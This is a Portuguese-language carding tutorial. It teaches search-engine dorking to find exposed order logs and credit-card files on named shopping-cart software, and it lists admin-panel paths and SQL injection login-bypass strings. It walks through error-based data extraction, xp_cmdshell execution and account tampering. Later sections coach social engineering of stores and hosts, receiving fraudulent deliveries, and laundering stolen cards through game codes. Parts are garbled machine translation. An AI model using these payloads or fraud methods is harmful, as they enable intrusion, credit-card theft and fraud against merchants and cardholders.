TUTORIAL CARDER
___________________________________________
Como achar Vunerabilidades nos seguintes servidores:
Ccbill
Aspcart
Cart32
CartCgi
CartPl
Ezmall2000
Midicart
Oscommerce
PdgCart
PfDisplay
Php Photo
Sales Cart
Sql Injection
WebStore
Sql Avançado
YABB
--------------------------------------------
CCBILL
Vá até um site de busca preferencialmente www.google.com.br e procure pelo seguinte: allinurl: /ccbill/ . Serão listados vários sites relacionados ao assunto. O próximo objetivo será a substituição do /ccbill/ por alguns do caracteres exatamente como segue o modelo abaixo.
www.athbrazil.com/ccbill/ Url Normal
www.athbrazil.com/ccbill/secure/order.log Url Alterada
www.athbrazil.com/ccbill/ Url Normal
www.athbrazil.com/ccbill/ccbill.log Url Alterada
www.athbrazil.com/ccbill/ Url Normal
www.athbrazil.com/ccbill/secure/currenty.log Url Alterada
www.athbrazil.com/ccbill/ Url Normal
www.athbrazil.com/ccbill/currenty.log Url Alterada
----------------------------------------------
aspcart:
Vá até um site de busca preferencialmente www.google.com.br e procure pelo seguinte: allinurl: /backend/ . Serão listados vários sites relacionados ao assunto. O próximo objetivo é simples você terá de substituir o /backend/ por aspcart5.mdb exatamente como mostra o modelo abaixo.
www.athbrazil.com/backend/xxx.asp Url Normal
www.athbrazil.com/aspcart5.mdb Url Alterada
----------------------------------------------
CARTCGI:
Vá até um site de busca preferencialmente www.google.com.br e procure pelo seguinte: allinurl: cart.cgi ou cartmanager.cgi . Serão listados vários sites relacionados ao assunto. O próximo objetivo será a substituição de cart.cgi ou cartmanager.cgi por /cgi-bin/Admin_files/ exatamente como segue o modelo abaixo.
www.athbrazil.com/cart.cgi Url Normal
www.athbrazil.com/cgi-bin/Admin_files/ Url Alterada
www.athbrazil.com/cartmanager.cgi Url Normal
www.athbrazil.com/cgi-bin/Admin_files/ Url Alterada
------------------------------------------------
CARTPL
Vá até um site de busca preferencialmente www.google.com.br e procure pelo seguinte: allinurl: cart.pl . Serão listados vários sites relacionados ao assunto. O próximo objetivo será a substituição de cart.pl por alguns do caracteres exatamente como segue o modelo abaixo.
www.athbrazil.com/cart.pl Url Normal
www.athbrazil.com/target/cgi-bin/cart.pl?vars Url Alterada
www.athbrazil.com/cart.pl Url Normal
www.athbrazil.com/target/cgi-bin/cart.pl?env Url Alterada
www.athbrazil.com/cart.pl Url Normal
www.athbrazil.com/target/cgi-bin/cart.pl?db Url Alterada
-----------------------------------------------
MIDICART
Vá até um site de busca preferencialmente www.google.com.br e procure pelo seguinte: allinurl: meny2.asp . Serão listados vários sites sobre o assunto. No próximo passo a seguir você terá de substituir o meny2.asp por midicart.mdb exatamente como mostra o modelo abaixo.
www.athbrazil.com/meny2.asp Url Normal
www.athbrazil.com/midicart.mdb Url Alterada
www.athbrazil.com/shop/meny2.asp Url Normal
www.athbrazil.com/shop/midicart.mdb Url Alterada
-------------------------------------------------
OSCOMMERCE
Vá até um site de busca preferencialmente www.google.com.br e procure pelo seguinte allinurl: /oscommerce/ . Serão listados vários sites relacionados ao assunto. O próximo passo será acrescentar alguns caracteres junto a url do site exatamente como segue o modelo abaixo.
www.athbrazil.com/oscommerce/ Url Normal
www.athbrazil.com/oscommerce/admin/orders.php Url Alterada
www.athbrazil.com/oscommerce/ Url Normal
http://www.athbrazil.com/oscommerce...dmin/orders.php Url Alterada
--------------------------------------------------
PDG CART
Vá até um site de busca preferencialmente www.google.com.br e procure pelo seguinte allinurl: shopper.cgi ou shopper.exe . Serão listados vários sites relacionados ao assunto. O próximo passo será acrescentar um dos caracteres da lista abaixo exatamente como no modelo.
www.athbrazil.com/cgi-bin/shopper.cgi Url Normal
http://www.athbrazil.com/cgi-bin/sh...PLATE=ORDER.LOG Url Alterada
www.athbrazil.com/cgi-bin/shopper.exe Url Normal
http://www.athbrazil.com/cgi-bin/sh...PLATE=ORDER.LOG Url Alterada
Lista de caracteres a serem adicionados após shopper.cgi ou shopper.exe siga exatamente como no modelo acima.
/PDG/cvv2.txt
/stats/cgi-bin/PDG_Cart/orders.txt
/cgi/PDG_Cart/order.log.%207,%200.94,%20/cgi-bin/PDG_cart/card.txt
/Admin_files/order.log
/Orders/order.log
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/shopper.exe?key=&20&preadd=action&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=%20&template=order.log
/cgi-bin/PDG
/cgi-bin/.../cc.log
/cgi-bin/.../cvv.csv
/cgi-bin/.../cc.csv
/cgi-bin/.../cc.txt
/cgi-bin/.../cvv2.txt
/cgi-bin/.../card.csv
/cgi-bin/.../cvv.txt
/cgi-bin/.../order.csv
/cgi-bin/.../order.txt
/cgi-bin/.../card.log
/cgi-bin/.../card.txt
/cgi-bin/.../orders.txt
/cgi-bin/.../cvv2.csv
/cgi-bin/.../debug.txt
/cgi-bin/.../mc.log
/cgi-bin/.../ccv.csv
/cgi-bin/.../authorize.cvs
/cgi-bin/.../authorizenets.old
/admin/cgi-bin/.../card.txt
/cgi-bin/shoppper.exe/.../card.log
/cgi-bin/shoppper.exe/.../card.txt
/cgi-bin/.../ccv.log
/cgi-bin/.../debug.log
/cgi-bin/.../ccv.txt
/cgi-bin/.../mc.txt
/cgi-bin/.../order.log
/cgi-bin/.../mc.csv
/cgi-bin/.../cvv2.log
/cgi-bin/.../cvv.log
/cgi-bin/.../authorizenet.log
/admin/cgi-bin/.../card.csv
/cgi-bin/.../shopper.conf
/admin/cgi-bin/.../card.log
/cgi-bin/shoppper.exe/.../order.csv
/cgi-bin/shoppper.exe/.../order.log
/cgi-bin/shoppper.exe/.../order.txt
/stats//cgi-bin/.../order.csv
/shopper.exe/cgi-bin/.../shopper.conf
/cgi-bin/cgi-bin/.../order.log
/PDG_Cart/order.log
/cgi-bin/shoppper.exe/PDG_cart/order.log
/cgi-bin/
/cgi-bin/shoppper.exe/PDG_cart/order.log
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/PDG_Cart/
/cgi-bin/PDG_cart/card.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/shopper.cgi/&TEMPLATE=ORDER.LOG
/PDG_Cart/authorizenet.txt
/pdg_cart/order.log
/orders.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cvv.mbf
/cvv.dbf
/cvv.ldf
/PDG_Cart/cc.txt
-----------------------------------------
SALES CART
Vá até um site de busca preferencialmente www.google.com.br procure pelo seguinte allinurl: mall/lobby.htm . Serão listados vários sites relacionados ao assunto. O próximo passo será a substituição do mall/lobby.htm por algum dos caracteres exatamente como no modelo abaixo.
www.athbrazil.com/mall/lobby.htm Url Normal
www.athbrazil.com/fpdb/shop.mdb Url Alterada
www.athbrazil.com/shoponline/mall/lobby.htm Url Normal
www.athbrazil.com/shoponline/fpdb/shop.mdb Url Alterada
---------------------------------------------------
SQL INJECTION
Bom está vulnerabilidade se trata da localização do painel de controle de um site onde apenas o administrador do site tem acesso.O acesso é usado para efetuar eventuais mudanças na home page e eventuais conferencias de pedidos em caso de e-commerce.
Para chegar até o painel de controle primeiramente você deve localiza-lo usando "Strings" que se trata de caracteres que complementam a url do site afim de encontrar o painel. Veja como seria olhando o modelo baixo.
www.amazonrecords.com.br Url Normal
www.amazonrecors.com.br/admin/index.asp Url Alterada
Após a localização do painel você terá usar carecteres como login e senha até conseguir entrar com exito no site.Logo abaixo você verá relação de "Strings" e caracteres a ser usado como login e senha nos painéis de controle.
Strings que devem ser adicionadas junto a url do site assim como no modelo acima.
/admin/default.asp
/admin/index.asp
/admin/login.asp
/admin/password.asp
/admin/senha.asp
/login/login.asp
/adm/login.asp
/adm/index.asp
/adm/default.asp
/login/index.asp
/login/default.asp
/webmaster/login.asp
/webadmin/default.asp
/webadmin/index.asp
/webadmin/default.asp
/menu_admin/default.asp
/menu_admin/index.asp
/menu_admin/login.asp
/noticias/admin/
/news/admin/
/cadastro/admin/
/portal/admin/
/site/admin/
/home/admin.asp
/home/admin/index.asp
/home/admin/default.asp
/home/admin/login.asp
/web/admin/index.asp
/web/admin/default.asp
/web/admin/login.asp
/home/adm/login.asp
/home/adm/senha.asp
/home/adm/index.asp
/home/adm/defaul.asp
/menu/admin/index.asp
/menu/admin/default.asp
/menu/admin/login.asp
/menu/admin/admin.asp
/painel/admin/admin.asp
/painel/admin/login.asp
/painel/admin/index.asp
/painel/admin/default.asp
Caracteres que devem ou podem ser usados como login e senha após localização do painel.
' or ' 1
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin
shell
root
Lembrando essa vulnerabilidade se baseia na falha do administrador nem todos os sites estão vulneraveis.
------------------------------------------------
WEBSTORE
Vá até um site de busca preferencialmente www.google.com.br e procure pelo seguinte allinurl: web_store.cgi . Serão listados vários sites relacionados ao assunto. O próximo passo será a substituição do web_store.cgi por Admin_files/order.log exatamente como segue o modelo abaixo.
www.athbrazil.com/web_store.cgi Url Normal
www.athbrazil.com/Admin_files/order.log Url Alterada
------------------------------------------------
ADVANCED SQL INJECTION
1 - O que é sql injection ?
é um truque para injectar comandos SQL via paginas web , já que qualquer pagina web recebe parametros do usuario e os transmite para o banco de dados .
Imaginemos por exemplo uma pagina web escrita em asp que nos peça o username e a password . O que a pagina web vai fazer é enviar o username e a password para o banco de dados e este verificar se é um user ou password validos !
Então porque não inserimos códigos SQL ? OK ! Isto só não é teoria como é possível !
2 - O que é preciso ?
Qualquer web browser
3 - Onde eu começo ?
Tente olhar por paginas que posssuam logins , submits , feedback search etc , enfim essencialmente paginas que possuam codigos asp ! Mas nós sabemos que os códigos em asp são interpretados no server ! ok ! tente olhar para o código HTML então . Por exemplo :
Vemos aqui códigos delimitados por e que podem ser exploitados.
4 - Que linguagens são vulneráveis ?
Paginas web com ASP, JSP, CGI, ou PHP , por exemplo observe esta pagina http://windefense/index.asp?id=10
5 - Como testar se uma pagina é vulnerável ?
Tente começando com um simples truque em um campo que receba parametros ex : username
Password
coloque :
hi' or 1=1--
Podemos testar assim :
username: hi' or 1=1--
Password: hi' or 1=1--
Ou com a seguinte URL
http://windefense/index.asp?id=hi' or 1=1--
Nós tinhamos visto antes um form vulnerável , ele segue abaixo :
Bem podemos fazer umas trocas para nossos intuitos !( Veja o html da pagina alvo e faça alterações e depois salve)
http://windefense/Search/search.asp method=post>
Se der certo podemos nos logar sem qualquer username ou password !
6 - Como executar comandos remotos com SQL injection ?
Se podemos injectar comandos sql então estamos aptos a correr comandos com boas permissões , e note que o MS SQLserver corre por default com privilégios de sistema ! ( Equivalente a privilégios de administrador )
Observe por exemplo a seguinte string que nos permite executar comandos no server :
master..xp_cmdshell
Podemos tentar uma execução de comando :
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Tente usar a cota dupla(") ou a simples(') se nao der certo
7 - Caçando dados do banco de dados utilizando ODBC error message
Nós podemos manipular os erros ODBC do banco de dados para trazer dados do banco de dados observe por exemplo esta URL normal :
http://windefense/index.asp?id=10
nós podemos tentar unir ( UNION ) o valor '10' com outra string do banco de dados , observe :
http://windefense/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
A tabela INFORMATION_SCHEMA.TABLES contem informações sobre todas as tabelas do sistema com a string TABLE_NAME podemos receber informações sobre nomes de tabelas no banco de dados .
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
Retorna o nome da primeira tabela do banco de dados . Se o sql server tenta converter a string UNION para um integer ocorre o erro seguinte :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /index.asp, line 5
Algo nos interessa aqui . Podemos ver que provocamos um erro e retornamos o nome da 1ª tabela do banco de dados que é "table1" . Para obter o nome da proxima tabela inserimos a seguinte query :
http://windefense/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
Ou procurar dados com uma query , inserindo um comando sql de comparação (LIKE) :
http://windefense/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Onde o output é o seguinte :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int. /index.asp, line 5
Neste caso nos retornamos com a string , '%25login%25' na tabela escolhida (TABLE_NAME) , contendo a string "login" que retornou o login do admin que é "admin_login".
Podemos mapear tabelas com a seguinte string :
INFORMATION_SCHEMA.COLUMNS
http://windefense/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. /index.asp, line 5
Agora nós podemos usar a string NOT IN () para trazer o nome da proxima coluna :
http://windefense/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5
Agora se raciocinarmos um pouco podemos obter outras coisinhas importantes como nomes colunas de id's , passwords , detalhes etc com a seguinte query :
http://windefense/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. /index.asp, line 5
Como retornar dados :
Vimos acima que podemos identificar nomes de tabelas , colunas etc . Agora o bom disso é que podemos utilizar a mesma tecnica para retornar dados da mesma , como por exemplo retornar o 1º "login_name" da tabela "admin_login" com a seguinte query :
http://windefense/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int. /index.asp, line 5
Já conhecemos o login_name que é "neo" agora precisamos conhecer a password com a sequinte query
http://windefense/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int. /index.asp, line 5
Podemos ver realmente que retornamos aqui uma password "m4trix" para um user "neo" .
Como retornar passwords com valor numerico !
Um problema com este tipo de retorno é que valores numericos nao podem ser retornado via uma query do tipo :
http://windefense/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
Se o usuario possui uma password do tipo : "31173" provavelmente teriamos no nosso browser o seguinte : "Page Not Found"
Para resolver este problema nos podemos juntar uma string numerica com alguns alfabetos :
http://windefense/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
Simplesmente usamos o sinal de (+) para juntar a password com qualquer texto que nós queremos (Codigo ASCII para '+' = 0x2b). Nós juntamos com um espaço(%20) a palavra morpheus . E manualmente chamando a função convert() para converter '31173 morpheus' dentro de um integer, o servidor sql retorna o seguinte erro :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int. /index.asp, line 5
Podemos ver que a password "31173" é retornada antes da string "morpheus"
Updates , e inserção de dados !
Se podemos retornar dados de uma tabela certamente que podemos updatear(actualizar) e inserir dados dentro do banco de dados :
Imaginemos o seguinte cenario podemos trocar usernames , passwords , inserir novos users , novas passwords etc .
Tentemos trocar a password para o user "neo" :
UPDATE = Comando sql para actualizar dados
http://windefense/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'-- Agora o user "neo" tem uma password com o nome "newpas5"
INSERT = Comando sql para inserir dados
Para inserir dados na database usamos a seguinte query :
http://windefense/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
Podemos notar aqui novos valores da tabela admin_login como : ('login_id', 'login_name', 'password', 'details') para valores de : 666,'neo2','newpas5','NA'
Podemos nos logar como user "neo" e pass "newpas5"
-----------------------------------------------
YaBB.pl
Vá até um site de busca preferencialmente www.google.com.br e procure pelo seguinte: allinurl: YaBB.pl . Serão listados vários sites relacionados ao assunto. Próximo objetivo será a substituição do YaBB.pl pelo caracteres exatamente como segue o modelo abaixo.
www.athbrazil.com/YaBB.pl Url Normal
http://www.athbrazil.com/cgi-bin/Ya..../etc/passwd%00 Url Alterada
Isso não é um problema de bug ou vulnerabilidade do banco de dados uma vez que a técnica
do SQL Injection funciona em qualquer banco de dados mesmo Oracle mas sim uma falha do desenvolvedor da página.
Voce tentara achar o painel de administracao do site online e iria inserir comandos strings se o site estiver aceitando
caracteres uala voce entra pois se o admin colocou algumas linhas para nao aceitar os caracteres ou seja as strings no
codigo fonte do site babou.
O tio vai explicar um pouco sobre isto e que muitos dizem ser antiga e nao conseguir nada com isto bla bla bla eu consigo
Bem pros ze ruela ze mane bundao ai vao as dicas.
Consiste em achar a tela de administracao online do site achando voce ira inserir as strings
diretorios que tentara achar no site
exemplo: www.amx.com.br/admin/index.asp (Atencao este site e so de exemplo)
Endereco: http://www.amx.com.br/admin/index.asp e vai tentando estes diretorios e se tiver o painel online tenta inserir
nos campos de login e senha as strings.
Diretorios e um scan de sql você escontra abaixo:
http://www.olharhacker.(**).com.br/scan_sql.zip
Strings (as strings inserir nos campos login e senha)
A string que passa pelos e-mails é: eu@eu.com'or'.11'='.11
usuario='geek' senha='s3nh4'
usuario='' or '1' senha='s3nh4'
usuario= 'or' senha= 'or'
usuario=' or ' 1 senha=' or ' 1
usuario='1' = '1' senha='1' = '1'
usuario=' or '1'='1 senha=' or '1'='1
usuario='' or '1'='1' senha='' or '1'='1'
usuario="senha" senha="senha"
usuario="password" senha="password"
usuario="teste" senha="teste"
usuario="123" senha="123"
usuario="1234" senha="1234"
usuario="12345" senha="12345"
usuario="VB" senha="VB"
usuario="visual" senha="visual"
usuario="basic" senha="basic"
usuario=' or senha='teste senha=' or senha='teste
usuario=' or senha='login senha=' or senha='login
usuario=' or email like 'flavio% senha= ' or email like 'flavio%
usuario='or '1'='1' order by 1 -- senha='or '1'='1' order by 1 --
usuario=' or '1'='1' order by 1 -- senha=' or '1'='1' order by 1 --
usuario=' or 1=1-- senha=' or 1=1--
usuario='or''=' senha='or''='
usuario=' or 'a'='a senha=' or 'a'='a
usuario=') or ('a'='a senha=') or ('a'='a
usuario=b' or ' 1=' senha=b' or ' 1='
usuario=' or '| senha=' or '|
usuario=123'or'= senha=123'or'=
usuario=admin'- senha=admin'-
usuario=' or '1=true senha=' or '1=true
usuario=7' or ' 1 senha=7' or ' 1
usuario=root senha=root
usuario=shell senha=shell
usuario=admin senha=123456
usuario=admin senha=admin
Usuario=‘;shutdown-- senha=‘;shutdown--
Burrice ou esquecimento com logins padroes ou de testes se o site estiver hospedado na locaweb
podera tentar tamb logar com o nome da locaweb podera ver no site da www.registro.br os nomes e
os emails e tentar logar com eles ou com o nome do site ou do servdor onde hospeda o site.
Ou tambem podera elaborar um email e mandar para onde o site esta hospedado dizendo ter um
site de vendas online e esta procurando um servidor novo e gostaria de conhecer os servicos
e se caso teria servicos de administracao online do site (ou seja o painel online que e seu alvo)
se caso o cabra do suporte confirmar o que voce precisa pergunte se existe algum que poderia
usar para teste para conhecer pois muitos tem logins padroes para teste e mais uma vez se o
cabra falar o login padrao de teste deles tenta logar no seu site alvo com este login de teste
pois para a nossa sorte muitos admin esquecem de trocar o login padrao e a senha do painel
online.
Existem outras strings mais voce tambem pode criar as suas
Bem tente procurar os sites no bom e famoso google veja em outros buscadores tambem ou procure sites de vendas online
Mais bugs loja asp
ir no google botar allinurl:loja/cadastro.asp e trocar loja/cadastro.asp por loja/cadastro.mdb
Para evitar o acesso do SQL Injection de limites no tamanho do campo login (não permitir mais de 8 ou 10
caracteres) e proibir o uso de caracteres especiais como aspas, apóstrofes, sinais de + e -.
ou Coloque no formulario do site
function sqli(valor) sqli = replace(valor,"'","++") end function Para reverter function sqlv(valor) sqlv = replace(valor,"++","''") end function.
CARDEANDO
Bom, galera acho que chegamos a um ponto de nossas vidas onde que todos sabem o que é carder e acho que não temos nem mais a necessidade de ficar escrevendo o que é carder pois bem, acho que devemos colocar em nossas cabeças que carder é diferente de comprador virtual ou comprador impulsivo ham não entendeu? Então vou explicar de forma passo a passo, porém não quero aqui ficar esnobando uns ous outros e sim quero esclarecer o que é carder.
Carder: Hack do Cartão de Crédito aproveita vulnerabilidades e exploram com maior facilidade e consegue utilizar os dados capturados para realizarem compras via Internet sem pagarem e terem maiores problemas com o mesmo.
Está atenta a nova tecnologia, conhecem o chão e toda a estrutura do e-commerce nacional como estrangeiro, sabe a utilizar engenharia social para obter seus dados não só na Internet como fora dela, conhece a maioria se não toda a estrutura de banco de dados existente no mercado.
Conhecendo seu alvo ele sabe como atacar da melhor forma possível e tendo o melhor nível de êxito em suas investidas contra o comércio eletrônico.
Leva um seguinte tema em sua vida “ Nada é 100% Seguro e Não só de Cartão vive o Carder e sim de todo conhecimento e investida nele apostados para obter seus dados e seus lucros “
Resumindo Carder não é comprador e sim um estudioso especialista em e-commerce e cartão de crédito.
Comprador Virtual: Se resume em todos as pessoas que navegam na internet e realizam suas compras na comodidade de suas casas, porém o comprador virtual dentro da Hierarquia Carder nada mais é que um Adolescente que entra em canais de IRC e começam avacalhar dentro do Chat pedindo cartão de crédito para comprar seus brinquedinhos, são pessoas que pouco conhece do ambiente carder e não possui o básico das técnicas para realizarem ataques, são pessoas sempre duras de cartão de crédito, se o grupo não passa ela não tem e quando tem não sabe se vai conseguir pois foi o amigo que passou e ela não sabe se é Full ( exclusivo ) dela ou se é Ruim pois foi passado por terceiros.
Resumindo Comprador Virtual nada mais é que pessoas brincando de aventuras e comprando com dados de terceiros fornecidos por terceiros e que não foram elas que pegaram e sim outras pessoas que os passaram, não entende de vulnerabilidade e pouco sabe de Engenharia Social, pois se soubessem ao menos utilizar poderia tentar explorar a vulnerabilidade humana e se safar de ser chamado de Comprador Virtual e seguir uma vida estável sendo chamado de um Carder Social Engineering.
Não quis pegar pesado mais não estou aqui para contar história para criança dormir e escrever só palavras bonitas, na real a verdade tenque ser dita.
CARDEANDO.
Hó isso é entrar no site de e-commerce vê se aceita cartão de crédito e ir as compras, Correto?
Correto nada, isso é coisa de pessoas que são impulsivas em realizar compras na Internet, o verdadeiro processo para chegar as conclusões de que a loja é um bom alvo para seu ataque.
1º Processo: Identificando a Loja
Nesse processo vamos saber se realmente a loja pode receber nossa visita e se ela poderá nos visitar para nos pegar =o)
Visite os Links e veja se o Certificado de Segurança do site é um link que mostre as informações de data do certificado e se realmente a loja é um ponto confiável ou se não é mais umas das armadilhas tanto dos seus amiguinhos carders como dos toca preta hehehe.
Procure obter informações dentro da camada WEB, ou seja, verifique se têm informações de como PAGAR – PRAZO DE ENTREGA – CONTATO – TELEVENDAS – POLITICA E PRIVACIDADE.
2º Processo: Social Engineering ou seja se as informações não foram suficientes para você saber se a loja é segura para você aplicar o golpe a melhor maneira é a que vou descrever agora:
aplique engenharia social no televendas da loja, ué mais como?
Seguinte pegue o numero do televendas e ligue, mais não atenda o telefone e diga que você é um carder e quer fraudar a loja e quer saber se é seguro, pelo contrário se passe como um cliente e ligue inocentemente e diga que esta vendo o catálogo de produtos via Web e quer saber o preço etc.. Formas de pagamento e etc... Mais agora vem o ataque. Chega como quem não quer nada e diga ao atendente é seguro comprar nessa loja via Internet?
E pergunte porque.. Quando ele responder essas perguntas diga a ele que se seus dados for roubados e mal utilizados o que eles irão fazer, qual a garantia de segurança e providência a serem tomadas. Pergunte o máximo que puder e como o Cliente sempre tem a razão e estar em seu direito de estar preocupado com seus dados o Atendente ira responder e fazendo isso você já conheceu a terra em que está pisando e automaticamente vai verificar o grau de perigo em sua investida e vai decidir se vai ou não cardear nessa loja.
3°Processo: Entrega
Esta é hora mais importante,a hora que você estará recebendo o pedido.
Nos dias atuais é um pouco mais complicado você receber seu pedido,pois antigamente todas as lojas entregavam em lanbux,caixa postal etc...Hoje nem todas entregam mas caso você queira alugar uma caixa postal no correio fique a vontade. A forma mais fácil é pedir para aquele seu amigo de confiança receber pra você,de preferencia um que não tenha computador,que seja esperto e que tenha um bom papo. Mas pra que isso? Caso de rolo ele irá saber como se comportas.
Ele terá que ficar atento com o movimento da rua,caso ele observe algo estranho o melhor a fazer é não receber o pedido.Caso peçam pra apresentar rg fale que sabe o número de cabeça. OBS: saiba pelo menos quantos números tem um RG. Mande seu pedido para presente com cartãozinho de amor para que não haja desconfiança .
Transformando cc inter e paypal em dinheiro na mão com dados virtuais
Comprar e vender dados virtuais pode ser uma maneira muito segura e eficaz de tirar algum dinheiro de ccs internacionais e paypals.
Primeiro: Oq exatamente seria dado virtual?
Procure por "mmorpg" no google e de uma olhada para ver c entende doq c trata(c já souber ou c tiver já alguma idéia continue lendo q vou explicar de forma rápida.)
Mmorpg = Massive Multiplayer Online Role Play Game
Esse e um tipo de jogo onde existe taxa de inscrição e mensalidade para jogar nos servidores do jogo.
Com isso, todo conteúdo do jogo vale dinheiro, pois tempo literalmente vale dinheiro nesses jogos.
Vantagens de segurança:
Primeiro: Dados virtuais quando comprados são entregues no mesmo momento, e não tendo como banir o código após o verdadeiro dono estornar pois ninguém grava qual cartão compro qual código
Segundo: Todo trabalho ilegal e feito em terra gringa, apenas a venda do code e no Brasil e nesse ponto da operação já esta tudo legal, assim dificultando e muito que alguém lhe pegue.
Segue uma lista de jogos q podem vir a render algum dinheiro:
Lineage2
Ultima Online
Lineage
Final Fantasy XI
City of Heroes
Dark Age of Camelot
Everquest
Everquest 2
Star Wars Galaxies
World of Warcraft
E mais...
Oque cardiar? Oque vender?
Com cc inter:
Cd-key do jogo: valor médio de 50 dólares
(esse tipo de jogo e vendido tanto caixa com cd e manual + cd-key ou apenas a cd-key e o comprador recebe uma pagina para download do jogo)
Game Card: valor médio 15 dolares por mês sendo de 2 ou 3 meses cada game card.
(numero tipo pré-pago N meses)
Com paypal:
Você usara o ebay para compra com paypal, podendo comprar os itens acima ou leiloes de personagens já fortes no servidor ou itens como dinheiro ou uma arma no valor desde 10 dólares ate 5000 6000 mil dólares.
Transformando em reais:
Depois de comprar algum dos itens virtuais acima você terá q procurar compradores para seus códigos. Existem fóruns brasileiros de todos os jogos listado acima onde o dinheiro e bem movimentado pelo jogo ser pago.
Anuncie e venda por deposito bancário.
Precauções:
Não venda muito barato, nem mesmo deixe que fiquem sabendo que o item e cardiado. Pois ninguém mais irá comprar.
GOGOGO vai trampa
Agora q você já sabe a teoria e partir pra pratica, procure pelos sites cardeaveis e foruns para a venda.
Segue 1 site cardiavel q vende cd key 50$ de Lineage2 e City of Heroes.
http://www.plaync.com
Crie uma conta, ative com o código enviado para o seu e-mail, ai vá em manage, logue na conta criada e procure por purchase code. (não use o mesmo cc em mais de 2 contas pois e banido)
PHP-SHOP
O phpShop é uma aplicação PHP- baseada do e-comerce e as ofertas do phpShop da estrutura do desenvolvimento de PHP as características básicas necessitadas funcionar um Web site bem sucedido do e-comerce e estender suas potencialidades para o phpShop múltiplo das finalidades usam uma estrutura agradável do desenvolvimento que permita que os colaboradores da correia fotorreceptor estendam facilmente sua funcionalidade com o uso dos módulos. Sua arquitetura da correia-caixa faz fácil de compreender e trabalhar com, ao fornecer a gerência que poderosa da função as potencialidades para sua aplicação da correia fotorreceptor necessitam.
É uma das soluções dirigida SQL as mais populares do e-comerce do php disponíveis hoje.
Vulnerabilidade Da Injeção do Sql: o phpShop é à injeção do SQL ao atualizar uma sessão. As edições podem ser exploradas através da injeção dos comandos do SQL emitidos à variável da "página".
A mesma edição está também atual ao adicionar um artigo ao carro de shopping através da variável do "product_id". Quando não como sério, a variável offset for também prone à injeção do SQL.
A injeção offset não é provável ser explorada.
Abaixo estão os exemplos das vulnerabilidades mencionados acima.
] do?page=[Evil_Query /?page=shop/cart&func=cartAdd&product_id=[Evil_Query /?page=shop/browse&category_id=&offset=[Evil_Query ] deve-se também anotar que mesmo se um atacante não pode com sucesso executar uma pergunta maliciosa, podem injetar o código que permite assim o local transversal Scripting. Vulnerability Da Divulgação Da Informação Do Usuário:
É possível para um usuário ganhar a informação muita sobre todo o cliente perguntando o módulo de "account/shipto". Tudo que é requerido deve ser entrado sob um cliente válido. Um pode então também ver a informação dos administradores.
Como nós podemos ver abaixo do código, não há nenhuma verificação para ver se a pessoa que pergunta a informação pertencer às perguntas do cliente he/she. <?php se ($$user_info_id) { $$q = "SELECIONE * do user_info ONDE user_info_id='$user_info_id '"; $$db->query($q); $$db->next_record(); }? >
Exemplo: /?page=account/shipto&user_info_id=[Valid usuário ID ] de usuário das identificações o começo geralmente em torno do número 18 - 20 assim que é fácil ao atacante de guess. A e não podem então ver o info de todo o cliente.
